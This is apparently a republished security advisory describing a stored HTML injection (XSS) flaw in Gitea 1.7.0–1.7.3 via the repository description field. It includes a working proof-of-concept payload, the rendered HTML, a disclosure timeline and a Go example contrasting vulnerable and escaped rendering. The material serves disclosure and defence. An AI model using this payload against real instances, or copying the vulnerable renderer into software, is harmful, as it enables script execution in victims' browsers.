Gitea 1.7.3 HTML Injection

2019.03.19
Credit: Anti Rais
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Gitea 1.7.3 stored HTML injection (XSS)
#######################################

Information
===========

Name: Gitea 1.7.0 - 1.7.3 stored HTML injection
Software: Gitea - a self-hosted Git service
Homepage: https://gitea.io/
Vulnerability: stored HTML injection
Affected: 1.7.0 - 1.7.3
Tested: 1.7.2, 1.7.3
Fixed: 1.7.4
Prerequisites: permission to edit repository settings
Severity: low
CVE: NA
Credit: Anti Räis
HTML version: https://bitflipper.eu/

Description
===========

Gitea is a self-hosted Git repository service. Versions 1.7.0 - 1.7.3 are affected by a stored HTML injection vulnerability: an authenticated user can place an HTML payload in a repository's description field, and it is executed when a victim navigates to the malicious repository's code page.

Proof of Concept
================

The attacker creates a new public repository and sets its description to the following payload:

==================== source start ========================
<img id="xss" src="http://onerror=eval( document.querySelectorAll('span')[10].innerText)//"> <span>document.querySelector('#xss').parentNode.innerHTML='\x3cmarquee style=color:red\x3eXSS\x3c/marquee\x3e';alert('XSS')</span>
==================== source end ========================

The code is executed when the victim navigates to the malicious repository's code page. The `onerror` handler `eval`s the JavaScript stored in the injected `<span>`; the index `[10]` selects that span in the tested version's page layout and would need to be adjusted for a different layout.

The following HTML snippet, taken from the rendered code page, demonstrates the issue. The description's URL autolinker wraps the `http://...` string in an anchor, while the `<img>` and `<span>` tags supplied in the description are emitted unescaped:

==================== source start ========================
<div id="repo-desc">
  <span class="description has-emoji"><img id="xss" src="<a href="http://onerror=eval( document.querySelectorAll(&#39;span&#39;)[10].innerText)//">" target="_blank" rel="noopener noreferrer">http://onerror=eval( document.querySelectorAll(&#39;span&#39;)[10].innerText)//"></a> <span> document.querySelector(&#39;#xss&#39;).parentNode.innerHTML=&#39;\x3cmarquee style=color:red\x3eXSS\x3c/marquee\x3e&#39;;alert(&#39;XSS&#39;)</span> </span>
  <a class="link" href=""></a>
</div>
==================== source end ========================

Impact
======

An authenticated attacker can execute JavaScript in the victim's browser in the context of the Gitea instance and could use it, for example, to change code in the victim's repository.

Conclusion
==========

A new release was published as a result, and the vulnerability is patched in Gitea 1.7.4.

References
==========

1) New release announcement
   https://blog.gitea.io/2019/03/gitea-1.7.4-is-released/
2) Patch pull request on GitHub
   https://github.com/go-gitea/gitea/pull/6306

Timeline
========

28.02.2019 | me                 | vulnerability discovered
28.02.2019 | me > developer     | sent report to the developers; no response
06.03.2019 | me > developer     | asked for status update
06.03.2019 | developer > me     | answer to status update: they are working on a patch
13.03.2019 | developer > public | patched version released
17.03.2019 | me > public        | published vulnerability details

---
Anti Räis
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com
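The rendered snippet above shows the shape of the bug: the description is autolinked and then emitted as trusted HTML, so tags the user typed survive. The Go program below is an added illustration, not Gitea's code and not the change made in the referenced pull request; it contrasts that pattern with an escape-first renderer. The URL regex, the function names and the benign sample description are this example's own assumptions; the payload string is the one from the proof of concept.

```go
package main

import (
	"fmt"
	"html"
	"regexp"
	"strings"
)

// urlPattern is a simplified autolink pattern (an assumption for this example,
// not Gitea's own regex): an http(s) URL running up to the next whitespace,
// double quote or angle bracket.
var urlPattern = regexp.MustCompile(`https?://[^\s"<>]+`)

// advisoryPayload is the description string from the advisory's proof of
// concept, embedded here as test input.
const advisoryPayload = `<img id="xss" src="http://onerror=eval( document.querySelectorAll('span')[10].innerText)//"> <span>document.querySelector('#xss').parentNode.innerHTML='\x3cmarquee style=color:red\x3eXSS\x3c/marquee\x3e';alert('XSS')</span>`

// anchorFormat mirrors the anchor markup visible in the rendered snippet.
const anchorFormat = `<a href="%[1]s" target="_blank" rel="noopener noreferrer">%[1]s</a>`

// renderDescriptionVulnerable reproduces the broken pattern: the raw,
// user-controlled description is autolinked and the result is treated as
// trusted HTML, so any tags in the description reach the page unescaped.
func renderDescriptionVulnerable(desc string) string {
	return urlPattern.ReplaceAllStringFunc(desc, func(u string) string {
		return fmt.Sprintf(anchorFormat, u)
	})
}

// renderDescriptionSafe HTML-escapes every byte of the description, both the
// text between URLs and each URL itself (escaped once, then used as href and
// as link text), and only then inserts the anchor markup. Because the regex
// only accepts http(s) schemes, a javascript: href cannot be smuggled in.
func renderDescriptionSafe(desc string) string {
	var b strings.Builder
	last := 0
	for _, m := range urlPattern.FindAllStringIndex(desc, -1) {
		b.WriteString(html.EscapeString(desc[last:m[0]]))
		fmt.Fprintf(&b, anchorFormat, html.EscapeString(desc[m[0]:m[1]]))
		last = m[1]
	}
	b.WriteString(html.EscapeString(desc[last:]))
	return b.String()
}

// leaksRawTag reports whether rendered output still contains an unescaped
// tag that came from the description rather than from the autolinker.
func leaksRawTag(rendered string) bool {
	return strings.Contains(rendered, "<img") || strings.Contains(rendered, "<span")
}

func main() {
	vuln := renderDescriptionVulnerable(advisoryPayload)
	safe := renderDescriptionSafe(advisoryPayload)
	fmt.Println("vulnerable:", vuln)
	fmt.Println("leaks raw tag:", leaksRawTag(vuln))
	fmt.Println("safe:", safe)
	fmt.Println("leaks raw tag:", leaksRawTag(safe))
}
```

The check to carry over to a real code base is the second renderer's ordering: escape first, autolink second, and never build `template.HTML` from a string that still contains user bytes that were not escaped.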


Copyright 2024, cxsecurity.com